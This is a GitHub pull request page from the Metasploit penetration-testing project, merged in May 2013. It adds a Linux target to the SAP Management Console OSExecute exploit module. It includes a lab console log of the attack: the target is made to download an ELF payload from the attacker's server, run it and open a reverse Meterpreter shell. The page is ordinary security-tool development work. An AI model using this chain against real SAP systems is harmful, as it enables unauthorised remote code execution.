Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Convert sap_mgmt_con_osexec_payload to multi platform #1819

Merged
merged 2 commits into from
May 14, 2013
Merged

Convert sap_mgmt_con_osexec_payload to multi platform #1819

merged 2 commits into from
May 14, 2013

Conversation

jvazquez-r7
Copy link
Contributor

This module converts modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb in a multi platform exploit by adding a new Linux Target.

Remote platform auto detection is possible with the GetEnvironment operation. I've not been able to add an Automatic target cleanly atm because of the next:

  • The module uses the Msf::Exploit::Remote::HttpServer mixin.
  • The mixin above redefines regenerate_payload, in order to use it for new clients, which isn't the purpose here.
  • Tried to call generate_single_payload from Exploit directly but no success atm.

Because of the exposed above, the autotarget, at this moment is limited to a check of the remote platform, and warn the user if the selected target doesn't fit the auto detection (letting him to run the exploit anyway, since auto detection could fail I dont want to stop the user from his intended exploit action).

  • Result:
msf exploit(sap_mgmt_con_osexec_payload) > check
[+] The target is vulnerable.
msf exploit(sap_mgmt_con_osexec_payload) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.179:50013 - Auto Detecting Remote Platform...
msf exploit(sap_mgmt_con_osexec_payload) > [+] 192.168.172.179:50013 - Linux successfully detected...
[*] 192.168.172.179:50013 - Starting up our web service on http://192.168.172.1:8080/ihWAhKHiZSvZm ...
[*] Using URL: http://0.0.0.0:8080/ihWAhKHiZSvZm
[*]  Local IP: http://192.168.0.6:8080/ihWAhKHiZSvZm
[*] 192.168.172.179:50013 - Asking the SAP Management Console to download http://192.168.172.1:8080/ihWAhKHiZSvZm
[*] 192.168.172.179:50013 - Sending the payload to the server...
[*] 192.168.172.179:50013 - Waiting for the victim to request the ELF payload...
[*] 192.168.172.179:50013 - Asking the SAP Management Console to chmod /tmp/nhmpnemk
[*] 192.168.172.179:50013 - Asking the SAP Management Console to execute /tmp/nhmpnemk
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.172.179
[*] Meterpreter session 6 opened (192.168.172.1:4444 -> 192.168.172.179:50240) at 2013-05-12 08:29:45 -0500
[+] Deleted /tmp/nhmpnemk
  • On the other hand, this pull request also deprecates the original module modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb in order to not delete it until a reasonable time, since maybe people is using the current module actually and we don't want to break user experience :)

wchen-r7 added a commit that referenced this pull request May 14, 2013
@wchen-r7
Landing #1819 - Convert sap_mgmt_con_osexec_payload to multi platform
41e9f35
@wchen-r7 wchen-r7 merged commit ce594a3 into rapid7:master May 14, 2013
@jvazquez-r7 jvazquez-r7 deleted the sap_mgmt_con_osexec_payload_multi branch November 18, 2014 15:56
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7